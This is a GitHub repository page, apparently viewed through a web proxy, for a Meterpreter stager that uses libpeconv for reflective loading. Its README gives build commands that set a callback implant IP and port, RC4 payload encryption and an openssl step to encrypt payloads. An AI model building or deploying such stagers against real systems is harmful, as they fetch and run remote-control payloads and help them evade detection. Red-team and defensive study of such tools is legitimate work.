8000 GitHub - tothi/stager_libpeconv: A basic meterpreter protocol stager using the libpeconv library by hasherezade for reflective loading
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content

A basic meterpreter protocol stager using the libpeconv library by hasherezade for reflective loading

Notifications You must be signed in to change notification settings

tothi/stager_libpeconv

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

stager_libpeconv

A basic meterpreter protocol stager using the libpeconv library by hasherezade for reflective loading

Don't forget to include submodules (actually libpeconv) while checking out:

git clone --recurse-submodules https://github.com/tothi/stager_libpeconv

Compiling should work on Linux (with mingw-w64 cross-compiler toolset installed) using the provided Makefile (config params for make are mandatory):

make stager IMPLANT_IP=192.168.56.1 IMPLANT_PORT=8889

The stager.exe binary output is built into the dist folder.

For basic RC4 payload encryption support, compile by configuring the key:

make stager IMPLANT_IP=192.168.56.1 IMPLANT_PORT=8889 RC4_KEY=1234567890123456

Currently only 16-char keys are supported (still no built-in padding).

For generating encrypted payload, you may use openssl (1.1):

openssl-1.1 enc -rc4 -in payload.exe -K `echo -n '1234567890123456' | xxd -p` -nosalt -out payload.bin

There is also local file load supported (besides the TCP Meterpreter stager). For activating local file read, compile with PAYLOAD_FILE option (RC4 is highly recommended with local payloads):

make stager PAYLOAD_FILE=stage.bin RC4_KEY=1234567890123456

For cleaning the stager:

make clean

For cleaning libpeconv also:

make cleanall

About

A basic meterpreter protocol stager using the libpeconv library by hasherezade for reflective loading

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published
0